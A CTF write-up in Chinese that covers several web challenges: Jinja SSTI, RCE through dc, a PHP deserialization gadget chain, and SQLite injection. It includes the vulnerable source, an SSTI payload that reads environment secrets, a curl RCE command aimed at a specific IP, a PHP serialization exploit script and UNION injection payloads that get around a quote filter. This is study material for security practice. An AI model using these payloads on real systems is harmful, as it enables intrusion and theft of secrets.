做不过来了,就跟着做了一点
第一周
#### ez_ssti
from flask import Flask, request, render_template, render_template_string
import os
app = Flask(__name__)
# The flag is read once at import time into a module global that nothing
# else in this file references.
flag=os.getenv("flag")
# NOTE: os.unsetenv() only removes the variable from the process's C-level
# environment; it does not update the os.environ mapping, so
# os.environ["flag"] still returns the value (the writeup's payload relies on
# exactly this). `del os.environ["flag"]` would scrub both.
os.unsetenv("flag")


@app.route('/')
def index() -> str:
    """Return this file's own source (the challenge discloses it on purpose).

    The handle returned by open() is never closed explicitly; a ``with``
    block would release it deterministically.
    """
    return open(__file__, "r").read()


@app.errorhandler(404)
def page_not_found(e) -> str:
    """Render a custom 404 page that echoes the requested URL.

    The URL is spliced into the template *source* with str.format() before
    Jinja parses it, so any ``{{ ... }}`` in the request path is evaluated on
    the server (server-side template injection). The safe form keeps the
    template constant and passes the URL as context, e.g.
    ``render_template_string("The Url {{ url }} ...", url=request.url)``.
    """
    print(request.root_url)
    return render_template_string("The Url {} You Requested Can Not Found".format(request.url))


if __name__ == '__main__':
    # Listens on every interface; debug mode is not enabled.
    app.run(host="0.0.0.0", port=8000)
直接在url后面添加
{{ config.__class__.__init__.__globals__['os'].environ['flag'] }}
即可
#### ez_rce
from flask import Flask, request
import subprocess
app = Flask(__name__)


@app.route("/")
def index() -> str:
    """Return this file's own source; the handle from open() is not closed explicitly."""
    return open(__file__).read()


@app.route("/calc", methods=['POST'])
def calculator() -> str:
    """Evaluate a POSTed ``expression`` with the external ``dc`` calculator.

    ``expression`` comes straight from the request form (untrusted); the
    default is only used when the field is missing or empty. The argv-list
    form keeps the shell out of the picture, but the string is still handed
    to ``dc -e``, whose own command language can run system commands (the
    writeup's ``!env`` payload shows this), so list-form subprocess is not a
    sandbox here. A real service would validate the expression against an
    allowlist of digits, whitespace and arithmetic operators before calling
    dc, and pass ``timeout=``. Only stdout is returned; stderr is dropped.
    """
    expression = request.form.get('expression') or "114 1000 * 514 + p"
    result = subprocess.run(["dc", "-e", expression], capture_output=True, text=True)
    return result.stdout


if __name__ == "__main__":
    app.run(host="0.0.0.0", port=8000)
直接rce
curl -X POST http://47.76.152.109:60081//calc -d "expression=1 2 + !env"
#### hello_web
签到
#### hello_http
http题目
#### ez_unser
php反序列化
<?php
// show_source() is an alias of highlight_file(): prints this file's own source.
show_source(__FILE__);
// Entry point of the gadget chain: __wakeup() runs as soon as an object of
// this class comes out of unserialize().
class Man{
    private $name="原神,启动";
    // str_split() requires a string, so an object stored in $name is
    // converted through its __toString() (What defines one) — link 1.
    public function __wakeup(){echo str_split($this->name);}
}
// Link 2: reached through string conversion of the object stored in Man::$name.
class What{
    private $Kun="两年半";
    // Reading ->hobby on an object that has no accessible property of that
    // name falls through to that object's __get() (Can defines one).
    public function __toString(){echo $this->Kun->hobby;return "Ok";}
}
// Link 3: reached via __get() from What::__toString().
class Can{
    private $Hobby="唱跳rap篮球";
    // var_dump() on an object that defines __debugInfo() invokes it (I does).
    public function __get($name){var_dump($this->Hobby);}
}
// Link 4: reached via __debugInfo() from Can::__get(). Calling an undefined
// method on the stored object dispatches to its __call() (Say defines one).
class I{
    private $name="Kobe";
    public function __debugInfo(){$this->name->say();}
}
// Link 5: ->Evil() on the stored object runs Mamba::Evil() directly, or
// Out::__call() when the stored object has no such method.
class Say{
    private $evil;
    public function __call($name, $arguments){$this->evil->Evil();}
}
// Sink 1: file write with request-controlled content. The body comes
// verbatim from $_POST["content"] and lands in the current directory under a
// timestamp-based .log name, which is then echoed back to the client.
class Mamba{
    public function Evil(){$filename=time().".log";file_put_contents($filename,$_POST["content"]);echo $filename;}
}
// Sink 2: rename() with request-controlled paths. Only the source path $o
// passes through the ".." replacement (a denylist-style filter); the
// destination $n is used as received. Resolving both with realpath() and
// checking them against an allowlisted directory would be the robust check.
class Out{
    public function __call($name,$arguments){$o = "./".str_replace("..", "第五人格",$_POST["o"]);$n = $_POST["n"];rename($o,$n);}
}
// The trigger: unserialize() on raw request data lets the client instantiate
// any of the classes above and fire their magic methods. Mitigation: do not
// unserialize untrusted input (use JSON), or at minimum pass
// ['allowed_classes' => false].
unserialize($_POST["data"]);
链子按类的定义顺序从上往下串起来就行：先写个文件，然后再去改名。exp 如下。
<?php
// show_source() is an alias of highlight_file(): prints this file's own source.
show_source(__FILE__);
/**
 * Stand-in for the target's Man class: same class name and private property
 * name, no magic methods, so serialize() produces the layout the target expects.
 */
class Man
{
    private $name;

    public function setname($name)
    {
        $this->name = $name;
    }
}
/**
 * Stand-in for the target's What class: same private property name, plain
 * setter instead of magic methods.
 */
class What
{
    private $Kun;

    public function setKun($Kun)
    {
        $this->Kun = $Kun;
    }
}
/**
 * Stand-in for the target's Can class: same private property name, plain
 * setter instead of magic methods.
 */
class Can
{
    private $Hobby;

    public function setHobby($Hobby)
    {
        $this->Hobby = $Hobby;
    }
}
/**
 * Stand-in for the target's I class: same private property name, plain
 * setter instead of magic methods.
 */
class I
{
    private $name;

    public function setname($name)
    {
        $this->name = $name;
    }
}
/**
 * Stand-in for the target's Say class: same private property name, plain
 * setter instead of magic methods.
 */
class Say
{
    private $evil;

    public function setevil($evil)
    {
        $this->evil = $evil;
    }
}
/** Empty stand-in for the target's Mamba class: only the class name matters to serialize(). */
class Mamba
{
}
/** Empty stand-in for the target's Out class: only the class name matters to serialize(). */
class Out
{
}
// Assemble the chain inside-out: each object is stored in the private
// property that the next class's magic method dereferences on the target.
$sink = new Mamba();
//$sink = new Out();
$say = new Say();
$say->setevil($sink);
$i = new I();
$i->setname($say);
$can = new Can();
$can->setHobby($i);
$what = new What();
$what->setKun($can);
$man = new Man();
$man->setname($what);
echo serialize($man);
#### ez_login
弱密码,admin/admin123
#### ez_sql
SQLite 注入，有黑名单；扔个 fuzz 看看，发现单双引号被过滤了。
没有单双引号，可以用 char() 拼出字符串；数字型注入也不用担心闭合。
用 ORDER BY 判断出列数为 5（虽然直接看也像是 5），然后构造 payload。
UNION SELECT NULL,NULL,NULL,NULL,group_concat(name) FROM sqlite_master WHERE type=char(116,97,98,108,101)--
UNION SELECT NULL,NULL,NULL,NULL,group_concat(name) FROM pragma_table_info(char(102,108,97,103))--
UNION SELECT NULL,NULL,NULL,NULL,group_concat(flag) FROM flag--